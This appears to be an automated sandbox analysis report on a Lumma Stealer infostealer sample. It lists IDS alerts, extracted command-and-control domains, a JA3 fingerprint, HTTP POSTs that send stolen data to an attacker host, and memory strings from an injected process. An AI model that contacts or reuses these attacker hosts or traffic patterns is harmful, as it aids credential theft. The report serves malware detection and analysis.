Source: Network traffic	Suricata IDS: 2049812 - Severity 1 - ET MALWARE Lumma Stealer Related Activity M2 : 192.168.2.4:49733 -> 172.67.157.254:443
Source: Network traffic	Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.4:49733 -> 172.67.157.254:443
Source: Network traffic	Suricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.4:49732 -> 172.67.157.254:443
Source: Network traffic	Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.4:49732 -> 172.67.157.254:443
Source: Network traffic	Suricata IDS: 2048094 - Severity 1 - ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration : 192.168.2.4:49735 -> 172.67.157.254:443

C2 URLs / IPs found in malware configuration

Source: Malware configuration extractor	URLs: charecteristicdxp.shop
Source: Malware configuration extractor	URLs: consciousourwi.shop
Source: Malware configuration extractor	URLs: cagedwifedsozm.shop
Source: Malware configuration extractor	URLs: potentioallykeos.shop
Source: Malware configuration extractor	URLs: weiggheticulop.shop
Source: Malware configuration extractor	URLs: deicedosmzj.shop
Source: Malware configuration extractor	URLs: weaknessmznxo.shop
Source: Malware configuration extractor	URLs: interactiedovspm.shop
Source: Malware configuration extractor	URLs: southedhiscuso.shop

Source: Joe Sandbox View	IP Address: 172.67.157.254 172.67.157.254
Source: Joe Sandbox View	IP Address: 23.55.153.106 23.55.153.106

Source: Joe Sandbox View

JA3 fingerprint: a0e9f5d64349fb13191bc781f81f42e1

Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49732 -> 172.67.157.254:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49740 -> 172.67.157.254:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49731 -> 23.55.153.106:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49733 -> 172.67.157.254:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49743 -> 172.67.157.254:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49742 -> 172.67.157.254:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49744 -> 172.67.157.254:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49745 -> 172.67.157.254:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49735 -> 172.67.157.254:443

Source: global traffic	HTTP traffic detected: GET /profiles/76561199724331900 HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Host: steamcommunity.com
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: lev-tolstoi.com
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 54Host: lev-tolstoi.com
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=be85de5ipdocierre1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 18170Host: lev-tolstoi.com
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=be85de5ipdocierre1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8791Host: lev-tolstoi.com
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=be85de5ipdocierre1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 20444Host: lev-tolstoi.com
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=be85de5ipdocierre1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 1285Host: lev-tolstoi.com
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=be85de5ipdocierre1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 588389Host: lev-tolstoi.com

Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1

Source: global traffic

HTTP traffic detected: GET /profiles/76561199724331900 HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Host: steamcommunity.com

Source: global traffic	DNS traffic detected: DNS query: weaknessmznxo.shop
Source: global traffic	DNS traffic detected: DNS query: potentioallykeos.shop
Source: global traffic	DNS traffic detected: DNS query: interactiedovspm.shop
Source: global traffic	DNS traffic detected: DNS query: charecteristicdxp.shop
Source: global traffic	DNS traffic detected: DNS query: cagedwifedsozm.shop
Source: global traffic	DNS traffic detected: DNS query: deicedosmzj.shop
Source: global traffic	DNS traffic detected: DNS query: southedhiscuso.shop
Source: global traffic	DNS traffic detected: DNS query: consciousourwi.shop
Source: global traffic	DNS traffic detected: DNS query: weiggheticulop.shop
Source: global traffic	DNS traffic detected: DNS query: steamcommunity.com
Source: global traffic	DNS traffic detected: DNS query: lev-tolstoi.com

Source: unknown

HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: lev-tolstoi.com

Source: aspnet_regiis.exe, 00000002.00000003.1966091168.0000000005003000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0
Source: aspnet_regiis.exe, 00000002.00000003.1966091168.0000000005003000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0B
Source: aspnet_regiis.exe, 00000002.00000003.1966091168.0000000005003000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://crl.rootca1.amazontrust.com/rootca1.crl0
Source: aspnet_regiis.exe, 00000002.00000003.1966091168.0000000005003000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl07
Source: aspnet_regiis.exe, 00000002.00000003.1966091168.0000000005003000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl0=
Source: aspnet_regiis.exe, 00000002.00000003.1966091168.0000000005003000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootCA.crl00
Source: aspnet_regiis.exe, 00000002.00000003.1966091168.0000000005003000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://crt.rootca1.amazontrust.com/rootca1.cer0?
Source: aspnet_regiis.exe, 00000002.00000003.1966091168.0000000005003000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.digicert.com0
Source: aspnet_regiis.exe, 00000002.00000003.1966091168.0000000005003000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.rootca1.amazontrust.com0:
Source: aspnet_regiis.exe, 00000002.00000003.1780046753.0000000002C24000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000003.1866290772.0000000002B8F000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000003.1741575094.0000000002C15000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000003.1741575094.0000000002C1B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://store.steampowered.com/account/cookiepreferences/
Source: aspnet_regiis.exe, 00000002.00000003.1780046753.0000000002C24000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000003.1866290772.0000000002B8F000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000003.1741575094.0000000002C15000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000003.1741575094.0000000002C1B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://store.steampowered.com/privacy_agreement/
Source: aspnet_regiis.exe, 00000002.00000003.1780046753.0000000002C24000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000003.1866290772.0000000002B8F000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000003.1741575094.0000000002C15000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000003.1741575094.0000000002C1B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://store.steampowered.com/subscriber_agreement/
Source: Amcache.hve.8.dr	String found in binary or memory: http://upx.sf.net
Source: aspnet_regiis.exe, 00000002.00000003.1780046753.0000000002C24000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000003.1741575094.0000000002C1B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.valvesoftware.com/legal.htm
Source: aspnet_regiis.exe, 00000002.00000003.1966091168.0000000005003000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://x1.c.lencr.org/0
Source: aspnet_regiis.exe, 00000002.00000003.1966091168.0000000005003000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://x1.i.lencr.org/0
Source: aspnet_regiis.exe, 00000002.00000003.1866856303.000000000500F000.00000004.00000800.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000003.1867108494.0000000004FF8000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://ac.ecosia.org/autocomplete?q=
Source: aspnet_regiis.exe, 00000002.00000003.1741575094.0000000002C1B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://avatars.fastly.steamstatic.com/fef49e7fa7e1997310d705b2a6158ff8dc1cdfeb_full.jpg
Source: aspnet_regiis.exe, 00000002.00000003.1968573576.0000000002C3D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://bridge.lga1.admarketplace.net/ctp?version=16.0.0&key=1696332238301000001.2&ci=1696332238417.
Source: aspnet_regiis.exe, 00000002.00000003.1968573576.0000000002C3D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://bridge.lga1.ap01.net/ctp?version=16.0.0&key=1696332238301000001.1&ci=1696332238417.12791&cta
Source: aspnet_regiis.exe, 00000002.00000003.1866856303.000000000500F000.00000004.00000800.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000003.1867108494.0000000004FF8000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
Source: aspnet_regiis.exe, 00000002.00000003.1866856303.000000000500F000.00000004.00000800.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000003.1867108494.0000000004FF8000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
Source: aspnet_regiis.exe, 00000002.00000003.1866856303.000000000500F000.00000004.00000800.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000003.1867108494.0000000004FF8000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
Source: aspnet_regiis.exe, 00000002.00000003.1780046753.0000000002C24000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000003.1866290772.0000000002B8F000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000003.1741575094.0000000002C15000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000003.1741575094.0000000002C1B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.fastly.steamstatic.com/public/css/applications/community/main.css?v=Lj6X7NKUMfzk&a
Source: aspnet_regiis.exe, 00000002.00000003.1780046753.0000000002C24000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000003.1741575094.0000000002C15000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000003.1741575094.0000000002C1B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.fastly.steamstatic.com/public/css/globalv2.css?v=hzEgqbtRcI5V&l=english&_c
Source: aspnet_regiis.exe, 00000002.00000003.1780046753.0000000002C24000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000003.1741575094.0000000002C15000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000003.1741575094.0000000002C1B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.fastly.steamstatic.com/public/css/promo/summer2017/stickers.css?v=Ncr6N09yZIap&amp
Source: aspnet_regiis.exe, 00000002.00000003.1780046753.0000000002C24000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000003.1741575094.0000000002C15000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000003.1741575094.0000000002C1B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.fastly.steamstatic.com/public/css/skin_1/header.css?v=EM4kCu67DNda&l=english&a
Source: aspnet_regiis.exe, 00000002.00000003.1780046753.0000000002C24000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000003.1741575094.0000000002C15000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000003.1741575094.0000000002C1B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.fastly.steamstatic.com/public/css/skin_1/modalContent.css?v=WXAusLHclDIt&l=eng
Source: aspnet_regiis.exe, 00000002.00000003.1780046753.0000000002C24000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000003.1741575094.0000000002C15000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000003.1741575094.0000000002C1B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.fastly.steamstatic.com/public/css/skin_1/profilev2.css?v=fe66ET2uI50l&l=englis
Source: aspnet_regiis.exe, 00000002.00000003.1780046753.0000000002C24000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000003.1866290772.0000000002B8F000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000003.1741575094.0000000002C15000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000003.1741575094.0000000002C1B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.fastly.steamstatic.com/public/images/skin_1/arrowDn9x5.gif
Source: aspnet_regiis.exe, 00000002.00000003.1780046753.0000000002C24000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000003.1741575094.0000000002C15000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000003.1741575094.0000000002C1B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.fastly.steamstatic.com/public/images/skin_1/footerLogo_valve.png?v=1
Source: aspnet_regiis.exe, 00000002.00000003.1780046753.0000000002C24000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000003.1866290772.0000000002B8F000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000003.1741575094.0000000002C15000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000003.1741575094.0000000002C1B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/applications/community/libraries~b28b7af6
Source: aspnet_regiis.exe, 00000002.00000003.1780046753.0000000002C24000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000003.1866290772.0000000002B8F000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000003.1741575094.0000000002C15000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000003.1741575094.0000000002C1B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/applications/community/main.js?v=THDq-gsQ
Source: aspnet_regiis.exe, 00000002.00000003.1780046753.0000000002C24000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000003.1866290772.0000000002B8F000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000003.1741575094.0000000002C15000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000003.1741575094.0000000002C1B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/applications/community/manifest.js?v=0Xxx
Source: aspnet_regiis.exe, 00000002.00000003.1780046753.0000000002C24000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000003.1741575094.0000000002C15000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000003.1741575094.0000000002C1B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/global.js?v=jWc2JLWHx5Kn&l=english&am
Source: aspnet_regiis.exe, 00000002.00000003.1780046753.0000000002C24000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000003.1741575094.0000000002C15000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000003.1741575094.0000000002C1B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/jquery-1.11.1.min.js?v=gQHVlrK4-jX-&l
Source: aspnet_regiis.exe, 00000002.00000003.1780046753.0000000002C24000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000003.1741575094.0000000002C15000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000003.1741575094.0000000002C1B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/modalContent.js?v=uqf5ttWTRe7l&l=engl
Source: aspnet_regiis.exe, 00000002.00000003.1780046753.0000000002C24000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000003.1741575094.0000000002C15000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000003.1741575094.0000000002C1B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/modalv2.js?v=zBXEuexVQ0FZ&l=english&a
Source: aspnet_regiis.exe, 00000002.00000003.1780046753.0000000002C24000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000003.1741575094.0000000002C15000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000003.1741575094.0000000002C1B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/profile.js?v=GeQ6v03mWpAc&l=english&a
Source: aspnet_regiis.exe, 00000002.00000003.1780046753.0000000002C24000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000003.1741575094.0000000002C15000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000003.1741575094.0000000002C1B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/promo/stickers.js?v=CcLRHsa04otQ&l=en
Source: aspnet_regiis.exe, 00000002.00000003.1780046753.0000000002C24000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000003.1741575094.0000000002C15000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000003.1741575094.0000000002C1B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/prototype-1.7.js?v=npJElBnrEO6W&l=eng
Source: aspnet_regiis.exe, 00000002.00000003.1780046753.0000000002C24000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000003.1741575094.0000000002C15000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000003.1741575094.0000000002C1B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/reportedcontent.js?v=-lZqrarogJr8&l=e
Source: aspnet_regiis.exe, 00000002.00000003.1780046753.0000000002C24000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000003.1741575094.0000000002C15000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000003.1741575094.0000000002C1B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/scriptaculous/_combined.js?v=pbdAKOcDIgbC
Source: aspnet_regiis.exe, 00000002.00000003.1780046753.0000000002C24000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000003.1741575094.0000000002C15000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000003.1741575094.0000000002C1B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/webui/clientcom.js?v=kOc26QwM0vlX&l=e
Source: aspnet_regiis.exe, 00000002.00000003.1780046753.0000000002C24000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000003.1741575094.0000000002C15000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000003.1741575094.0000000002C1B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.fastly.steamstatic.com/public/shared/css/buttons.css?v=qhQgyjWi6LgJ&l=english&
Source: aspnet_regiis.exe, 00000002.00000003.1741575094.0000000002C1B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.fastly.steamstatic.com/public/shared/css/motiva_sans.css?v=-yZgCk0Nu7kH&l=engl
Source: aspnet_regiis.exe, 00000002.00000003.1780046753.0000000002C24000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000003.1741575094.0000000002C15000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000003.1741575094.0000000002C1B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.fastly.steamstatic.com/public/shared/css/shared_global.css?v=wuA4X_n5-mo0&l=en
Source: aspnet_regiis.exe, 00000002.00000003.1780046753.0000000002C24000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000003.1741575094.0000000002C15000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000003.1741575094.0000000002C1B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.fastly.steamstatic.com/public/shared/css/shared_responsive.css?v=JL1e4uQSrVGe&
Source: aspnet_regiis.exe, 00000002.00000003.1780046753.0000000002C24000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000003.1741575094.0000000002C1B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.fastly.steamstatic.com/public/shared/images/header/logo_steam.svg?t=962016
Source: aspnet_regiis.exe, 00000002.00000003.1780046753.0000000002C24000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000003.1741575094.0000000002C1B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.fastly.steamstatic.com/public/shared/images/responsive/header_logo.png
Source: aspnet_regiis.exe, 00000002.00000003.1780046753.0000000002C24000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000003.1741575094.0000000002C1B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.fastly.steamstatic.com/public/shared/images/responsive/header_menu_hamburger.png
Source: aspnet_regiis.exe, 00000002.00000003.1780046753.0000000002C24000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000003.1741575094.0000000002C1B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.fastly.steamstatic.com/public/shared/images/responsive/logo_valve_footer.png
Source: aspnet_regiis.exe, 00000002.00000003.1780046753.0000000002C24000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000003.1741575094.0000000002C1B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.fastly.steamstatic.com/public/shared/javascript/auth_refresh.js?v=w6QbwI-5-j2S&amp
Source: aspnet_regiis.exe, 00000002.00000003.1780046753.0000000002C24000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000003.1741575094.0000000002C15000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000003.1741575094.0000000002C1B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.fastly.steamstatic.com/public/shared/javascript/shared_global.js?v=Gr6TbGRvDtNE&am
Source: aspnet_regiis.exe, 00000002.00000003.1780046753.0000000002C24000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000003.1741575094.0000000002C15000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000003.1741575094.0000000002C1B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.fastly.steamstatic.com/public/shared/javascript/shared_responsive_adapter.js?v=tvQ
Source: aspnet_regiis.exe, 00000002.00000003.1780046753.0000000002C24000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000003.1741575094.0000000002C15000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000003.1741575094.0000000002C1B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.fastly.steamstatic.com/public/shared/javascript/tooltip.js?v=QYkT4eS5mbTN&l=en
Source: aspnet_regiis.exe, 00000002.00000003.1968573576.0000000002C3D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://contile-images.services.mozilla.com/0TegrVVRalreHILhR2WvtD_CFzj13HCDcLqqpvXSOuY.10862.jpg
Source: aspnet_regiis.exe, 00000002.00000003.1968573576.0000000002C3D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://contile-images.services.mozilla.com/obgoOYObjIFea_bXuT6L4LbBJ8j425AD87S1HMD3BWg.9991.jpg
Source: aspnet_regiis.exe, 00000002.00000003.1866856303.000000000500F000.00000004.00000800.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000003.1867108494.0000000004FF8000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/ac/?q=
Source: aspnet_regiis.exe, 00000002.00000003.1866856303.000000000500F000.00000004.00000800.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000003.1867108494.0000000004FF8000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/chrome_newtab
Source: aspnet_regiis.exe, 00000002.00000003.1866856303.000000000500F000.00000004.00000800.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000003.1867108494.0000000004FF8000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
Source: aspnet_regiis.exe, 00000002.00000003.1780046753.0000000002C24000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000003.1741575094.0000000002C1B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://help.steampowered.com/en/
